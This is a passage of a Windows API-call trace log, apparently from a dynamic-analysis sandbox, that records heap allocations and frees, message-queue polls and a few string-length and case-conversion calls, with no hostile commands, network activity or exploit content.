(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec6a0 [0084.383] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ec9d0 | out: hHeap=0x2af0000) returned 1 [0084.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.383] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ec9d0 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726c8 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6ecc0 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a727b8 [0084.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecaf0 | out: hHeap=0x2af0000) returned 1 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6ea90 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecad8 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecaf0 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72858 [0084.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72878 [0084.388] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0084.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6f030 | out: hHeap=0x2af0000) returned 1 [0084.388] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72878 | out: hHeap=0x2af0000) returned 1 [0084.388] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb20 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72878 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbc8 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecb08 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72888 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0084.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecbf8 [0084.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ecc28 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6f030 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0084.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5c08 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecc70 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eceb0 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0084.389] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72888 [0084.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79d80 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ece98 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72918 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79da8 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd60 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ae8 [0084.389] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd60 | out: hHeap=0x2af0000) returned 1 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79e48 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd60 [0084.389] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecda8 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79d80 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.390] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a7a000 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecd48 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72888 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecdc0 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729f8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecdd8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecdf0 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecdf0 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecdd8 | out: hHeap=0x2af0000) returned 1 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729f8 | out: hHeap=0x2af0000) returned 1 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0084.390] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0084.390] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a78 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecdd8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ecdf0 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729a8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72af8 [0084.390] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ab8 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ab8 | out: hHeap=0x2af0000) returned 1 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b38 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b38 | out: hHeap=0x2af0000) returned 1 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b78 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72af8 | out: hHeap=0x2af0000) returned 1 [0084.391] lstrlenW (lpString="20") returned 2 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc00 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b78 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729a8 | out: hHeap=0x2af0000) returned 1 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.391] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecdf0 | out: hHeap=0x2af0000) returned 1 [0084.391] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecdd8 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a78 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0084.392] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.392] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b68 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ed210 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729e8 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729f8 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729f8 | out: hHeap=0x2af0000) returned 1 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b48 [0084.392] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc00 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0084.392] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0084.393] lstrlenW (lpString="30") returned 2 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b48 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729e8 | out: hHeap=0x2af0000) returned 1 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ab8 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ed210 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b68 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ab8 | out: hHeap=0x2af0000) returned 1 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.393] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.393] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a28 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729b8 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede28 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b98 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ede58 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc00 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a18 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edc18 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a18 | out: hHeap=0x2af0000) returned 1 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd08 [0084.393] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0084.393] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd20 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729c8 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729c8 | out: hHeap=0x2af0000) returned 1 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729f8 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29eddc8 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc18 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edc00 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd08 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd20 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede58 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b98 | out: hHeap=0x2af0000) returned 1 [0084.394] lstrlenW (lpString="20") returned 2 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729f8 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eddc8 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ede28 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729b8 | out: hHeap=0x2af0000) returned 1 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb70 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edd68 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a729d8 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a28 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edd68 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729d8 | out: hHeap=0x2af0000) returned 1 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb70 | out: hHeap=0x2af0000) returned 1 [0084.394] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0084.394] PeekMessageW (in: lpMsg=0x8cefc8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cefc8) returned 0 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a729e8 [0084.394] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.394] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a729e8 | out: hHeap=0x2af0000) returned 1 [0084.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edb40 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edaf8 | out: hHeap=0x2af0000) returned 1 [0084.395] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29edaf8 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29edb40 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eceb0 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc70 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5c08 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6f030 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecdc0 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd48 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72888 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a000 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecda8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecd60 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79e48 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ae8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79da8 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecc28 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72878 | out: hHeap=0x2af0000) returned 1 [0084.395] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ecb20 | out: 